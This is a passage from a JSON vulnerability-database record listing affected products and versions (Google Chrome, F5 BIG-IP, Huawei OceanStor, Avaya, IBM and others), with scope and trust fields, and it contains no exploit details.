"vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.604.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.44" }, { "model": "secureplatform r70", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.35" }, { "model": "gaia embedded r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.756.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.34" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.123" }, { "model": "ipso r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "worklight quality assurance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "oceanstor s2200t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.51" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "gaia embedded r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.233" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.88" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "oceanstor s6800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.955.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.760.0" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.110" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.12" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.368.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.23" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.594.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.118" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia embedded r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.743.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.2" }, { "model": "finesse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96365" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.83" }, { "model": "2054-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.816.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.88" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.13" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.393.0" }, { "model": "e9000 blade server ch140 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.362.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.618.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.628.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.56" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.815.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.423.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.8" }, { "model": "system storage san80b-4 2498-b80", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.802.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.12" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "oceanstor s5500t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.323.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.804.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.77" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.370.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.95" }, { "model": "espace uc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.805.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.789.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.315" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.512.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.901.0" }, { "model": "t520 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura application server sip core pb23", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.0" }, { "model": "associates api management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.729.0" }, { "model": "secureplatform r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.102" }, { "model": "isoc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "8700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.483.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.467.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.10" }, { "model": "secureplatform r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.25" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.0" }, { "model": "qip", "scope": "eq", "trust": 0.3, "vendor": "alcatel lucent", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.1" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.5" }, { "model": "e9000 blade server ch242 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1017" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.727.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.748.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.7" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.89" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.379.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.654.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.72" }, { "model": "oceanstor s5500t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4" }, { "model": "rack server rh2285h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.8" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.73" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.334.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.303" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.0" }, { "model": "system storage san384b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-416" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.132" }, { "model": "uma-db v100r001c00spc302", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.336" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.602.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.2" }, { "model": "2054-e04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "virtualization provisioning service", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "espace usm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.931.0" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.722.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.520.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1022" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.651.0" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "oceanstor s6800t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.109" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.476.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.61" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.1" }, { "model": "oceanstor s5600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.347.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.13" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.412.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.27" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "vcloud connector", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "secureplatform r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere management assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.329.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1085.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.664.1" }, { "model": "gaia r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.26" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.596.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.103" }, { "model": "espace cc v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.69" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.730.0" }, { "model": "oceanstor s5500t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.0" }, { "model": "oceanstor s6800t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.40" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.610.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.422.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.48" }, { "model": "oceanstor cse v100r002c00lhwy01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.24" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "aura application server sip core pb28", "scope": "eq", "trust": 0.3, "vendor": "avaya", 